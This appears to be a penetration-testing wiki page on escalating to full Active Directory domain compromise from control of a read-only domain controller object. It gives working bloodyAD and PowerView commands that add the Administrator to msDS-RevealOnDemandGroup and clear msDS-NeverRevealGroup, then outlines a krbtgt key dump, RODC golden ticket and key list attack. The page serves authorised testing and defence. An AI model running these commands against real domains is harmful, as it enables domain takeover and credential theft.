Rights on RODC object
With administrative control over the RODC computer object in the Active Directory, there is a path to fully compromise the domain. It is possible to modify the RODC’s msDS-NeverRevealGroup
and msDS-RevealOnDemandGroup
attributes to allow a Domain Admin to authenticate and dump his credentials via administrative access over the RODC host.
Alternative #1: using bloodyAD
# Get original msDS-RevealOnDemandGroup values
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get object 'RODC-server$' --attr msDS-RevealOnDemandGroup
distinguishedName: CN=RODC,CN=Computers,DC=domain,DC=local
msDS-RevealOnDemandGroup: CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local
# Add the previous value plus the admin account
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set object 'RODC-server$' --attr msDS-RevealOnDemandGroup -v 'CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local' -v 'CN=Administrator,CN=Users,DC=domain,DC=local'
#If needed, remove the admin from the msDS-NeverRevealGroup attribute
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set object 'RODC-server$' --attr msDS-NeverRevealGroup
Then, dump the krbtgt_XXXXX
key on the RODC server with admin access on the host (this can be done by modifying the managedBy
attribute for example), and use it to forge a RODC golden ticket and conduct a key list attack to retrieve the domain Administrator's password hash.
Alternative #2: PowerView python package (Python) can be used to modify the LDAP attribute.
powerview "$DOMAIN"/"$USER":"$PASSWORD"@"RODC_FQDN"
#First, add a domain admin account to the msDS-RevealOnDemandGroup attribute
#Then, append the Allowed RODC Password Replication Group group
PV > Set-DomainObject -Identity RODC-server$ -Set msDS-RevealOnDemandGroup='CN=Administrator,CN=Users,DC=domain,DC=local'
PV > Set-DomainObject -Identity RODC-server$ -Append msDS-RevealOnDemandGroup='CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local'
#If needed, remove the admin from the msDS-NeverRevealGroup attribute
PV > Set-DomainObject -Identity RODC-server$ -Clear msDS-NeverRevealGroup
Resources
Last updated
Was this helpful?